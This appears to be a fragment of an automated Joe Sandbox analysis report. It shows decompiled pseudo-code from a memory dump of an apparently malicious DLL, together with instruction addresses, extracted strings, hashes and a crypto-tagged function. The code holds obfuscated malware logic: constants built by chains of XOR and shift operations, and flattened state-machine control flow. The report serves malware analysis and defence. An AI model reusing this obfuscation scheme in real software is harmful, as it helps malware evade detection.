				_v192 = _v192 ^ 0x00002efb;
				_v272 = 0x13fbcb;
				_v272 = _v272 + 0xffff66dd;
				_v272 = _v272 * 0x5d;
				_v272 = _v272 + 0xffff70cc;
				_v272 = _v272 ^ 0x070467b9;
				_v136 = 0xda75c;
				_v136 = _v136 << 0xe;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0xd703a46a;
				_v24 = 0x98e6;
				_v24 = _v24 | 0x30837cf6;
				_v24 = _v24 ^ 0x308cf6e6;
				_v196 = 0x2348e5;
				_v196 = _v196 + 0xec0b;
				_v196 = _v196 + 0xffff4f76;
				_v196 = _v196 + 0xffff4b3e;
				_v196 = _v196 ^ 0x002962b3;
				_v176 = 0x7bcaf7;
				_v176 = _v176 * 0x37;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xa986161e;
				_v120 = 0x3fa34;
				_v120 = _v120 * 0x49;
				_v120 = _v120 >> 7;
				_v120 = _v120 ^ 0x00066829;
				_v116 = 0x9c5c94;
				_v116 = _v116 + 0x20fd;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x0025da20;
				_v212 = 0x6b8402;
				_v212 = _v212 + 0x9bc6;
				_v212 = _v212 * 0x74;
				_v212 = _v212 + 0xe621;
				_v212 = _v212 ^ 0x30fe6560;
				_v96 = 0xbe9741;
				_v96 = _v96 + 0xffffd77c;
				_v96 = _v96 ^ 0x00bbad9c;
				_v304 = 0xe465cf;
				_v304 = _v304 >> 4;
				_v304 = _v304 << 5;
				_v304 = _v304 ^ 0x01c3ad6d;
				_v296 = 0xc47264;
				_v296 = _v296 << 0xc;
				_v296 = _v296 ^ 0x4720cdbf;
				_v132 = 0x7ca780;
				_v132 = _v132 + 0xa093;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0x3ea11d20;
				_t976 = _v8;
				_t987 = _v8;
				while(1) {
					L1:
					_t937 = 0xd154a5a;
					while(1) {
						_t846 = _v300;
						while(1) {
							L3:
							_t991 = _t978 - 0x7e00160;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								_t978 = 0xfd2ad77;
								continue;
							} else {
								if(_t978 == 0x1a1d1c) {
									__eflags = E00864BFC(_t976, _a16);
									_t978 = 0x6a5d586;
									_t866 = 1;
									_t874 =  !=  ? _t866 : _t874;
									goto L13;
								} else {
									if(_t978 == 0x352276a) {
										_t867 = E0086DDA9(_v168, _t876, _v280, _t876, _v240, _v144, _t876, _v88, _v112);
										_t987 = _t867;
										__eflags = _t867;
										_t978 =  !=  ? 0x6fee97d : 0xb1727d5;
										E00882B09(_v160, 0, _v216, _v128);
										_t989 =  &(_t989[0xa]);
										L39:
										_t876 = _a28;
										_t937 = 0xd154a5a;
										goto L40;
									} else {
										if(_t978 == 0x6a5d586) {
											E0087E358(_v196, _v176, _t976, _v120);
											_t978 = 0x6d75a8e;
											goto L12;
										} else {
											if(_t978 == 0x6d75a8e) {
												E0087E358(_v116, _v212, _t846, _v96);
												_t978 = 0xedc04fb;
												L12:
												L13:
												_t876 = _a28;
												goto L1;
											} else {
												if(_t978 != 0x6fee97d) {
													L40:
													__eflags = _t978 - 0xb1727d5;
													if(_t978 != 0xb1727d5) {
														_t846 = _v300;
														continue;
													}
												} else {
													_t846 = E0086ED66(_v20, _v184, _t987, _v248, _v124, _v152, _v204, _a40, _t876, _v104, _a20, _t876, _v28, _v48);
													_t876 = _a28;
													_t989 =  &(_t989[0xe]);
													_v300 = _t846;
													_t937 = 0xd154a5a;
													_t978 =  !=  ? 0xd154a5a : 0xedc04fb;
													continue;
												}
											}
										}
									}
								}
							}
							L43:
							return _t874;
						}
						__eflags = _t978 - _t937;
						if(_t978 == _t937) {
							__eflags =  *_t876;
							if(__eflags == 0) {
								_t847 = _v12;
							} else {
								_push(_v188);
								_push(_v72);
								_push(_v232);
								_t847 = E0087E1F8(0x861a0c, _v180, __eflags);
								_t989 =  &(_t989[3]);
								_v12 = _t847;
							}
							_t946 = _v16 | _v172 | _v264 | _v200 | _v64 | _v256 | _v164 | _v32 | _v56;
							_t980 = _a32 & 1;
							__eflags = _t980;
							if(_t980 != 0) {
								__eflags = _t946;
							}
							_t976 = E00864A88(1, _t946, _a48, _v156, 1, _t847, 1, _v208, _v92, _v300, _v100, _v292, _v224, 1, _v108);
							E0087FECB(_v12, _v68, _v76, _v84, _v288);
							_t989 =  &(_t989[0x10]);
							__eflags = _t976;
							if(_t976 == 0) {
								_t978 = 0x6d75a8e;
								goto L39;
							} else {
								_v36 = 1;
								E00883E0E(_v276,  &_v36, _v284, _v52, _v60, 4, _t976);
								_t989 =  &(_t989[5]);
								__eflags = _t980;
								if(_t980 != 0) {
									E0087C8CF( &_v36, _t976,  &_v8, _v148, _v244, _v252, _v260, _v268);
									_t769 =  &_v36;
									 *_t769 = _v36 | _v236;
									__eflags =  *_t769;
									E00883E0E(_v220,  &_v36, _v44, _v140, _v228, _v8, _t976);
									_t989 =  &(_t989[0xb]);
								}
								_t978 = 0xf81d281;
								goto L13;
							}
						} else {
							__eflags = _t978 - 0xdd5f83a;
							if(__eflags == 0) {
								__eflags = E0086EF0C(_t976, _v80, __eflags) - _v40;
								_t978 =  ==  ? 0x1a1d1c : 0x6a5d586;
								goto L13;
							} else {
								__eflags = _t978 - 0xedc04fb;
								if(_t978 == 0xedc04fb) {
									E0087E358(_v304, _v296, _t987, _v132);
								} else {
									__eflags = _t978 - 0xf81d281;
									if(_t978 == 0xf81d281) {
										_t885 =  *_t876;
										__eflags = _t885;
										if(_t885 == 0) {
											_t861 = 0;
											__eflags = 0;
										} else {
											_t861 = _a28[1];
										}
										_push(_t885);
										E008810DC(_t976, _v192, _v4, _t885, _v272, _v136, _v24, _t861);
										_t989 =  &(_t989[7]);
										asm("sbb esi, esi");
										_t978 = (_t978 & 0x073022b4) + 0x6a5d586;
										goto L13;
									} else {
										__eflags = _t978 - 0xfd2ad77;
										if(_t978 != 0xfd2ad77) {
											goto L40;
										} else {
											_t978 = 0x352276a;
											goto L3;
										}
									}
								}
							}
						}
						goto L43;
					}
				}
			}

0x008767f8
0x00876800
0x0087680a
0x00876811
0x00876818
0x0087681f
0x00876826
0x0087682d
0x0087682e
0x00876835
0x00876836
0x0087683d
0x00876844
0x0087684b
0x00876852
0x00876853
0x00876854
0x00876859
0x00876861
0x00876864
0x0087686e
0x00876878
0x00876880
0x00876882
0x0087688d
0x00876892
0x0087689d
0x008768a8
0x008768b3
0x008768be
0x008768c9
0x008768d4
0x008768df
0x008768ea
0x008768f5
0x00876900
0x0087690b
0x00876916
0x00876921
0x0087692c
0x00876937
0x0087693f
0x00876944
0x00876951
0x00876956
0x00876960
0x00876965
0x0087696b
0x00876973
0x0087697e
0x00876989
0x00876994
0x0087699c
0x008769a8
0x008769ab
0x008769ad
0x008769b1
0x008769b6
0x008769c0
0x008769cc
0x008769d1
0x008769d7
0x008769e4
0x008769e5
0x008769e9
0x008769f1
0x008769fc
0x00876a07
0x00876a12
0x00876a1d
0x00876a28
0x00876a30
0x00876a3b
0x00876a43
0x00876a4b
0x00876a53
0x00876a5b
0x00876a63
0x00876a70
0x00876a74
0x00876a7c
0x00876a84
0x00876a8c
0x00876a99
0x00876a9d
0x00876aa2
0x00876aa7
0x00876aaf
0x00876abc
0x00876ac0
0x00876ac5
0x00876aca
0x00876ad2
0x00876ae6
0x00876aed
0x00876af8
0x00876b03
0x00876b0b
0x00876b13
0x00876b18
0x00876b20
0x00876b28
0x00876b30
0x00876b38
0x00876b42
0x00876b46
0x00876b4e
0x00876b56
0x00876b5b
0x00876b63
0x00876b68
0x00876b70
0x00876b78
0x00876b80
0x00876b88
0x00876b95
0x00876b99
0x00876b9e
0x00876ba6
0x00876bae
0x00876bb6
0x00876bbe
0x00876bcb
0x00876bd4
0x00876bd8
0x00876be0
0x00876bed
0x00876bf3
0x00876bfb
0x00876c03
0x00876c0b
0x00876c13
0x00876c1b
0x00876c2a
0x00876c2d
0x00876c31
0x00876c39
0x00876c41
0x00876c49
0x00876c4e
0x00876c56
0x00876c5e
0x00876c6b
0x00876c6f
0x00876c77
0x00876c7f
0x00876c8b
0x00876c90
0x00876c96
0x00876c9e
0x00876ca6
0x00876cae
0x00876cb6
0x00876cbe
0x00876cc9
0x00876cd1
0x00876cdc
0x00876ce7
0x00876cef
0x00876cf7
0x00876d03
0x00876d08
0x00876d0e
0x00876d16
0x00876d21
0x00876d30
0x00876d35
0x00876d3e
0x00876d49
0x00876d5c
0x00876d5d
0x00876d64
0x00876d6f
0x00876d82
0x00876d89
0x00876d94
0x00876d9f
0x00876daa
0x00876db5
0x00876dc0
0x00876dce
0x00876dd2
0x00876dda
0x00876de2
0x00876dea
0x00876df7
0x00876e02
0x00876e0a
0x00876e15
0x00876e29
0x00876e2e
0x00876e37
0x00876e42
0x00876e4d
0x00876e60
0x00876e63
0x00876e66
0x00876e6d
0x00876e78
0x00876e80
0x00876e88
0x00876e90
0x00876e98
0x00876ea0
0x00876eab
0x00876eb3
0x00876ebe
0x00876ec9
0x00876ed6
0x00876eda
0x00876ee2
0x00876eea
0x00876ef2
0x00876efd
0x00876f08
0x00876f13
0x00876f1e
0x00876f29
0x00876f34
0x00876f3f
0x00876f47
0x00876f52
0x00876f5d
0x00876f68
0x00876f70
0x00876f7b
0x00876f83
0x00876f8d
0x00876f99
0x00876f9d
0x00876fa5
0x00876fb0
0x00876fb8
0x00876fc3
0x00876fce
0x00876fe1
0x00876fe8
0x00876ff3
0x00877005
0x0087700a
0x0087701a
0x0087701d
0x00877024
0x00877031
0x00877039
0x00877041
0x0087704f
0x00877054
0x00877058
0x00877060
0x0087706b
0x00877076
0x00877081
0x0087708c
0x00877097
0x008770a2
0x008770b1
0x008770b2
0x008770b6
0x008770c3
0x008770c7
0x008770cf
0x008770d7
0x008770db
0x008770e0
0x008770e8
0x008770f0
0x008770fb
0x00877103
0x0087710e
0x00877119
0x00877124
0x0087712f
0x0087713a
0x00877145
0x00877150
0x0087715b
0x00877166
0x00877171
0x00877179
0x00877186
0x0087718a
0x0087718f
0x00877197
0x0087719f
0x008771a7
0x008771af
0x008771b7
0x008771bf
0x008771ca
0x008771d5
0x008771e0
0x008771eb
0x008771f3
0x008771fe
0x00877209
0x0087721c
0x00877223
0x0087722e
0x0087723c
0x00877240
0x00877245
0x0087724d
0x00877255
0x0087725d
0x00877262
0x0087726f
0x00877273
0x0087727b
0x00877285
0x00877291
0x00877292
0x00877296
0x0087729e
0x008772a6
0x008772b1
0x008772bc
0x008772c7
0x008772d2
0x008772da
0x008772e5
0x008772f0
0x008772f8
0x00877300
0x00877308
0x0087730d
0x00877315
0x00877329
0x00877330
0x0087733b
0x00877346
0x0087734e
0x0087735b
0x0087735f
0x00877367
0x0087736f
0x0087737a
0x00877382
0x0087738a
0x00877395
0x008773a0
0x008773ab
0x008773b6
0x008773be
0x008773c6
0x008773ce
0x008773d6
0x008773de
0x008773f1
0x008773f8
0x00877400
0x0087740b
0x0087741e
0x00877425
0x0087742d
0x00877438
0x00877443
0x0087744e
0x00877456
0x00877461
0x00877469
0x00877476
0x0087747a
0x00877482
0x0087748a
0x00877495
0x008774a0
0x008774ab
0x008774b3
0x008774b8
0x008774bd
0x008774c5
0x008774cd
0x008774d2
0x008774da
0x008774e5
0x008774f0
0x008774f8
0x00877503
0x0087750a
0x00877511
0x00877511
0x00877511
0x00877516
0x00877516
0x0087751a
0x0087751a
0x0087751a
0x00877520
0x00000000
0x00000000
0x00877526
0x008776ab
0x00000000
0x0087752c
0x00877532
0x00877699
0x0087769b
0x008776a2
0x008776a3
0x00000000
0x00877538
0x0087753e
0x00877651
0x0087765d
0x00877672
0x00877679
0x0087767e
0x00877683
0x00877915
0x00877915
0x0087791c
0x00000000
0x00877544
0x0087754a
0x0087761e
0x00877623
0x00000000
0x00877550
0x00877556
0x008775f0
0x008775f5
0x008775fa
0x008775fc
0x008775fc
0x00000000
0x0087755c
0x00877563
0x00877921
0x00877921
0x00877927
0x00877516
0x00000000
0x00877516
0x00877569
0x008775b6
0x008775bb
0x008775c2
0x008775c7
0x008775d0
0x008775d5
0x00000000
0x008775d5
0x00877563
0x00877556
0x0087754a
0x0087753e
0x00877532
0x00877945
0x00877951
0x00877951
0x008776b5
0x008776b7
0x00877772
0x00877775
0x008777a6
0x00877777
0x00877777
0x00877783
0x0087778a
0x00877795
0x0087779a
0x0087779d
0x0087779d
0x008777e6
0x008777ed
0x008777ed
0x008777ef
0x008777f1
0x008777f1
0x00877841
0x00877858
0x0087785d
0x00877860
0x00877862
0x00877910
0x00000000
0x00877868
0x0087788b
0x00877892
0x00877897
0x0087789a
0x0087789c
0x008778c6
0x008778d6
0x008778d6
0x008778d6
0x008778fe
0x00877903
0x00877903
0x00877906
0x00000000
0x00877906
0x008776bd
0x008776bd
0x008776c3
0x00877763
0x0087776a
0x00000000
0x008776c9
0x008776c9
0x008776cf
0x0087793e
0x008776d5
0x008776d5
0x008776db
0x008776f3
0x008776f5
0x008776f7
0x00877705
0x00877705
0x008776f9
0x00877700
0x00877700
0x00877707
0x0087772c
0x00877731
0x00877736
0x0087773e
0x00000000
0x008776dd
0x008776dd
0x008776e3
0x00000000
0x008776e9
0x008776e9
0x00000000
0x008776e9
0x008776e3
0x008776db
0x008776cf
0x008776c3
0x00000000
0x008776b7
0x00877516

Strings

!, xrefs: 0087747A
=o, xrefs: 00876F70
H#, xrefs: 008773B6
)fVX, xrefs: 008768B3
^, xrefs: 0087706B
OHR, xrefs: 00877171
n3u, xrefs: 0087692C
OI, xrefs: 00877058
&B, xrefs: 00876E80
LG, xrefs: 00876892
2 ], xrefs: 008772F0
c', xrefs: 00876EF2
R<, xrefs: 00876DC0

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: c'$!$&B$)fVX$2 ]$LG$OHR$OI$R<$n3u$=o$H#$^
API String ID: 0-4090907037
Opcode ID: c21d4b3c6f1e61229321fd1d9d193c4c5274c06532568c5b511cb1c9f46e4c38
Instruction ID: 35cd34779c5cdf0c2996b94af6f8bc3eccc8d44ab823e43251782168ebfb0061
Opcode Fuzzy Hash: c21d4b3c6f1e61229321fd1d9d193c4c5274c06532568c5b511cb1c9f46e4c38
Instruction Fuzzy Hash: 2792FBB1509381CFD3B9CF25C58AA8BBBE1FBD4708F10891DE19996260D7B58949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0087A474, Relevance: 15.4, Strings: 12, Instructions: 357
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0087A474(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t422;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				void* _t487;
				void* _t488;
				signed int* _t492;

				_t492 =  &_v2792;
				_t487 = __ecx;
				_v2736 = 0xa43fec;
				_v2736 = _v2736 + 0xffff66c9;
				_v2736 = _v2736 >> 0xc;
				_v2736 = _v2736 ^ 0x00000a13;
				_v2788 = 0xca245c;
				_v2788 = _v2788 + 0xc295;
				_v2788 = _v2788 << 6;
				_v2788 = _v2788 + 0xffff0e49;
				_v2788 = _v2788 ^ 0x32b58b6e;
				_v2660 = 0x35f9ef;
				_v2660 = _v2660 << 0xe;
				_v2660 = _v2660 ^ 0x7e7543bd;
				_v2688 = 0x437073;
				_v2688 = _v2688 >> 0xe;
				_v2688 = _v2688 ^ 0xf2a4f008;
				_v2688 = _v2688 ^ 0xf2aac2be;
				_v2700 = 0x2c6eea;
				_v2700 = _v2700 >> 1;
				_v2700 = _v2700 | 0x2b7eca56;
				_v2700 = _v2700 ^ 0x2b78a774;
				_v2676 = 0xafd7a5;
				_v2676 = _v2676 >> 0xb;
				_v2676 = _v2676 ^ 0x0002223f;
				_v2740 = 0x8278b2;
				_v2740 = _v2740 << 6;
				_v2740 = _v2740 << 1;
				_v2740 = _v2740 ^ 0x4136a23a;
				_v2612 = 0x7f4f91;
				_v2612 = _v2612 + 0xffff9116;
				_v2612 = _v2612 ^ 0x007102c2;
				_v2668 = 0x4461fd;
				_v2668 = _v2668 * 0x27;
				_v2668 = _v2668 ^ 0x0a629f7c;
				_t488 = 0x219adc7;
				_v2756 = 0xa77258;
				_v2756 = _v2756 >> 2;
				_v2756 = _v2756 + 0x9d81;
				_t444 = 0x54;
				_v2756 = _v2756 * 0x70;
				_v2756 = _v2756 ^ 0x12998c8c;
				_v2628 = 0x3fd810;
				_v2628 = _v2628 + 0xfffff92f;
				_v2628 = _v2628 ^ 0x003ee59a;
				_v2780 = 0x9fe7be;
				_v2780 = _v2780 + 0xaec4;
				_v2780 = _v2780 << 0x10;
				_v2780 = _v2780 >> 2;
				_v2780 = _v2780 ^ 0x25a64a78;
				_v2620 = 0xbf1dbc;
				_v2620 = _v2620 + 0xffff98cb;
				_v2620 = _v2620 ^ 0x00bd158d;
				_v2732 = 0xa8760d;
				_v2732 = _v2732 << 8;
				_v2732 = _v2732 + 0xa9d7;
				_v2732 = _v2732 ^ 0xa87dd804;
				_v2684 = 0xb5ab85;
				_v2684 = _v2684 / _t444;
				_v2684 = _v2684 ^ 0x0004fa7b;
				_v2708 = 0x9eabf6;
				_t445 = 0x4f;
				_v2708 = _v2708 / _t445;
				_v2708 = _v2708 ^ 0xed59372e;
				_v2708 = _v2708 ^ 0xed517486;
				_v2608 = 0x5ae525;
				_v2608 = _v2608 * 0x4c;
				_v2608 = _v2608 ^ 0x1afb43af;
				_v2644 = 0xaf8ee5;
				_v2644 = _v2644 ^ 0xf4d3cb8d;
				_v2644 = _v2644 ^ 0xf47b6f68;
				_v2604 = 0xc38975;
				_v2604 = _v2604 >> 0xf;
				_v2604 = _v2604 ^ 0x000b5702;
				_v2652 = 0x27ffed;
				_v2652 = _v2652 + 0x9a12;
				_v2652 = _v2652 ^ 0x002af41d;
				_v2616 = 0x7935fe;
				_v2616 = _v2616 + 0x1306;
				_v2616 = _v2616 ^ 0x007d2870;
				_v2692 = 0x7d1b3a;
				_t446 = 0x7d;
				_v2692 = _v2692 * 0x5a;
				_v2692 = _v2692 * 0x29;
				_v2692 = _v2692 ^ 0x0b423dcb;
				_v2724 = 0xbe8a04;
				_v2724 = _v2724 * 0x27;
				_v2724 = _v2724 | 0x44bf91fe;
				_v2724 = _v2724 ^ 0x5dbe7768;
				_v2636 = 0x66ae7e;
				_v2636 = _v2636 + 0xffff18a5;
				_v2636 = _v2636 ^ 0x006a6401;
				_v2744 = 0x24afb7;
				_v2744 = _v2744 + 0xf221;
				_v2744 = _v2744 >> 2;
				_v2744 = _v2744 ^ 0x00088a95;
				_v2716 = 0x4884b4;
				_v2716 = _v2716 | 0xbbb03a66;
				_v2716 = _v2716 ^ 0xe76b33e5;
				_v2716 = _v2716 ^ 0x5c9d38b7;
				_v2672 = 0xd2ae7f;
				_v2672 = _v2672 / _t446;
				_v2672 = _v2672 ^ 0x00034be9;
				_v2680 = 0x28809f;
				_v2680 = _v2680 << 8;
				_v2680 = _v2680 ^ 0x28858fb3;
				_v2720 = 0x2529a6;
				_t447 = 0x60;
				_v2720 = _v2720 / _t447;
				_t448 = 0x55;
				_v2720 = _v2720 / _t448;
				_v2720 = _v2720 ^ 0x00015f05;
				_v2728 = 0xe4ec68;
				_v2728 = _v2728 | 0x076980de;
				_v2728 = _v2728 >> 0x10;
				_v2728 = _v2728 ^ 0x00066f44;
				_v2764 = 0x25662b;
				_v2764 = _v2764 + 0x352e;
				_v2764 = _v2764 + 0xd238;
				_v2764 = _v2764 >> 9;
				_v2764 = _v2764 ^ 0x0003808d;
				_v2696 = 0xd79a4d;
				_v2696 = _v2696 >> 0xf;
				_v2696 = _v2696 | 0xe296257b;
				_v2696 = _v2696 ^ 0xe2941eeb;
				_v2704 = 0x8f07c6;
				_v2704 = _v2704 << 6;
				_v2704 = _v2704 << 0xb;
				_v2704 = _v2704 ^ 0x0f8cdb18;
				_v2772 = 0x165ad0;
				_v2772 = _v2772 * 0x45;
				_v2772 = _v2772 * 0xe;
				_v2772 = _v2772 | 0xc27a990b;
				_v2772 = _v2772 ^ 0xd67b0e5a;
				_v2712 = 0x3a0787;
				_v2712 = _v2712 << 9;
				_v2712 = _v2712 << 3;
				_v2712 = _v2712 ^ 0xa0756bb8;
				_v2768 = 0xd1f7d1;
				_v2768 = _v2768 ^ 0x28b4518a;
				_v2768 = _v2768 ^ 0x2c50bf5e;
				_v2768 = _v2768 << 1;
				_v2768 = _v2768 ^ 0x086bcac7;
				_v2664 = 0x43880;
				_v2664 = _v2664 << 2;
				_v2664 = _v2664 ^ 0x001745f4;
				_v2776 = 0x99bfba;
				_v2776 = _v2776 + 0xb20b;
				_v2776 = _v2776 ^ 0x9325107f;
				_v2776 = _v2776 ^ 0x1bb55bce;
				_v2776 = _v2776 ^ 0x880f35ab;
				_v2784 = 0xcf6f67;
				_v2784 = _v2784 | 0xe7eb8da5;
				_t449 = 0x69;
				_v2784 = _v2784 * 5;
				_v2784 = _v2784 >> 0xc;
				_v2784 = _v2784 ^ 0x000ae4cd;
				_v2792 = 0x938e6a;
				_v2792 = _v2792 * 0x34;
				_v2792 = _v2792 + 0xd82d;
				_v2792 = _v2792 + 0xffff3001;
				_v2792 = _v2792 ^ 0x1dfcfd52;
				_v2640 = 0x59feb;
				_v2640 = _v2640 + 0xffffbab8;
				_v2640 = _v2640 ^ 0x000de14c;
				_v2760 = 0x4f2f51;
				_v2760 = _v2760 << 3;
				_v2760 = _v2760 | 0xca7d0b31;
				_v2760 = _v2760 >> 5;
				_v2760 = _v2760 ^ 0x06504f0f;
				_v2648 = 0x12de1c;
				_v2648 = _v2648 << 2;
				_v2648 = _v2648 ^ 0x0044c65b;
				_v2656 = 0xedb7d1;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x00060f5a;
				_v2624 = 0x25ed17;
				_v2624 = _v2624 << 8;
				_v2624 = _v2624 ^ 0x25e602f4;
				_v2632 = 0xdb105d;
				_v2632 = _v2632 + 0xbf07;
				_v2632 = _v2632 ^ 0x00d56ea2;
				_v2752 = 0xdb9922;
				_v2752 = _v2752 + 0xffff5c98;
				_t422 = _v2752 / _t449;
				_v2752 = _t422;
				_v2752 = _v2752 + 0xe0a7;
				_v2752 = _v2752 ^ 0x000f564b;
				_v2748 = 0x373105;
				_v2748 = _v2748 + 0xffff8875;
				_v2748 = _v2748 | 0xab9c3c2b;
				_v2748 = _v2748 ^ 0xabbdde7d;
				while(_t488 != 0x219adc7) {
					if(_t488 == 0x472b880) {
						E00861A34(_v2672,  &_v1040, _t449, _t449, _v2680, _v2720, _v2728, _t449, _v2736, _v2764);
						_push(_v2712);
						_push(_v2772);
						_push(_v2704);
						E00882D0A(_v2664, __eflags,  &_v2080, _v2776, _v2784, _v2792, 0x86192c,  &_v520,  &_v1040, E0087E1F8(0x86192c, _v2696, __eflags));
						E0087FECB(_t424, _v2640, _v2760, _v2648, _v2656);
						__eflags = 0;
						return E008785FF(_v2624, _v2632, 0, 0,  &_v520, 0, _v2752, 0, _v2748);
					}
					_t500 = _t488 - 0x6430241;
					if(_t488 != 0x6430241) {
						L7:
						__eflags = _t488 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t422;
						}
						L10:
						return _t422;
					}
					E00880DB1(_v2788,  &_v2600, _t500, _v2660, _t449, _v2688);
					 *((short*)(E008709DD(_v2700,  &_v2600, _v2676, _v2740))) = 0;
					E0086BAA9(_v2612, _v2668, _t500, _v2756, _v2628,  &_v1560);
					_push(_v2684);
					_push(_v2732);
					_push(_v2620);
					E00882D0A(_v2608, _t500,  &_v1560, _v2644, _v2604, _v2652, 0x86188c,  &_v2080,  &_v2600, E0087E1F8(0x86188c, _v2780, _t500));
					E0087FECB(_t436, _v2616, _v2692, _v2724, _v2636);
					_t449 = _v2744;
					_t422 = E0086BFBE( &_v2080, _t487, _v2716);
					_t492 =  &(_t492[0x18]);
					if(_t422 != 0) {
						_t488 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t488 = 0x6430241;
				goto L7;
			}

0x0087a474
0x0087a47e
0x0087a480
0x0087a48a
0x0087a492
0x0087a497
0x0087a49f
0x0087a4a7
0x0087a4af
0x0087a4b4
0x0087a4bc
0x0087a4c4
0x0087a4cf
0x0087a4d7
0x0087a4e2
0x0087a4ea
0x0087a4ef
0x0087a4f7
0x0087a4ff
0x0087a507
0x0087a50b
0x0087a513
0x0087a51b
0x0087a526
0x0087a52e
0x0087a539
0x0087a541
0x0087a546
0x0087a54a
0x0087a552
0x0087a55d
0x0087a568
0x0087a573
0x0087a586
0x0087a58d
0x0087a598
0x0087a59d
0x0087a5a5
0x0087a5aa
0x0087a5b9
0x0087a5bc
0x0087a5c0
0x0087a5c8
0x0087a5d3
0x0087a5de
0x0087a5e9
0x0087a5f1
0x0087a5f9
0x0087a5fe
0x0087a603
0x0087a60b
0x0087a616
0x0087a621
0x0087a62c
0x0087a634
0x0087a639
0x0087a641
0x0087a649
0x0087a65f
0x0087a666
0x0087a671
0x0087a67d
0x0087a680
0x0087a684
0x0087a68c
0x0087a694
0x0087a6a7
0x0087a6ae
0x0087a6bb
0x0087a6c6
0x0087a6d1
0x0087a6dc
0x0087a6e7
0x0087a6ef
0x0087a6fa
0x0087a705
0x0087a710
0x0087a71b
0x0087a726
0x0087a731
0x0087a73c
0x0087a74b
0x0087a74e
0x0087a757
0x0087a75b
0x0087a763
0x0087a770
0x0087a774
0x0087a77c
0x0087a784
0x0087a78f
0x0087a79a
0x0087a7a5
0x0087a7ad
0x0087a7b5
0x0087a7ba
0x0087a7c2
0x0087a7ca
0x0087a7d2
0x0087a7da
0x0087a7e2
0x0087a7f8
0x0087a7ff
0x0087a80a
0x0087a815
0x0087a81d
0x0087a828
0x0087a834
0x0087a839
0x0087a843
0x0087a846
0x0087a84a
0x0087a852
0x0087a85a
0x0087a862
0x0087a867
0x0087a86f
0x0087a877
0x0087a87f
0x0087a887
0x0087a88c
0x0087a894
0x0087a89c
0x0087a8a1
0x0087a8a9
0x0087a8b1
0x0087a8b9
0x0087a8be
0x0087a8c3
0x0087a8cb
0x0087a8d8
0x0087a8e1
0x0087a8e7
0x0087a8f4
0x0087a901
0x0087a909
0x0087a90e
0x0087a913
0x0087a91b
0x0087a923
0x0087a92b
0x0087a933
0x0087a937
0x0087a93f
0x0087a94a
0x0087a952
0x0087a95d
0x0087a965
0x0087a96d
0x0087a975
0x0087a97d
0x0087a985
0x0087a98d
0x0087a99c
0x0087a99d
0x0087a9a1
0x0087a9a6
0x0087a9ae
0x0087a9bb
0x0087a9bf
0x0087a9c7
0x0087a9cf
0x0087a9d7
0x0087a9e2
0x0087a9ed
0x0087a9f8
0x0087aa00
0x0087aa05
0x0087aa0d
0x0087aa12
0x0087aa1a
0x0087aa25
0x0087aa2d
0x0087aa38
0x0087aa43
0x0087aa4b
0x0087aa56
0x0087aa61
0x0087aa69
0x0087aa74
0x0087aa7f
0x0087aa8a
0x0087aa95
0x0087aa9d
0x0087aaa9
0x0087aaab
0x0087aaaf
0x0087aab7
0x0087aabf
0x0087aac7
0x0087aacf
0x0087aad7
0x0087aadf
0x0087aaed
0x0087ac4c
0x0087ac51
0x0087ac5d
0x0087ac61
0x0087acaa
0x0087acca
0x0087acd9
0x00000000
0x0087acfa
0x0087aaf3
0x0087aaf5
0x0087ac13
0x0087ac13
0x0087ac19
0x00000000
0x00000000
0x00000000
0x00000000
0x0087ad07
0x0087ad07
0x0087ad07
0x0087ab12
0x0087ab37
0x0087ab5b
0x0087ab60
0x0087ab6c
0x0087ab70
0x0087abc2
0x0087abe2
0x0087abee
0x0087abfa
0x0087abff
0x0087ac04
0x0087ac0a
0x00000000
0x0087ac0a
0x00000000
0x0087ac04
0x0087ac11
0x00000000

Strings

L, xrefs: 0087A9ED
+f%, xrefs: 0087A86F
spC, xrefs: 0087A4E2
.7Y, xrefs: 0087A684
.5, xrefs: 0087A877
3k, xrefs: 0087A7D2
Q/O, xrefs: 0087A9F8
p(}, xrefs: 0087A731
%Z, xrefs: 0087A694
h, xrefs: 0087A852
$P, xrefs: 0087A47C
n,, xrefs: 0087A4FF

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
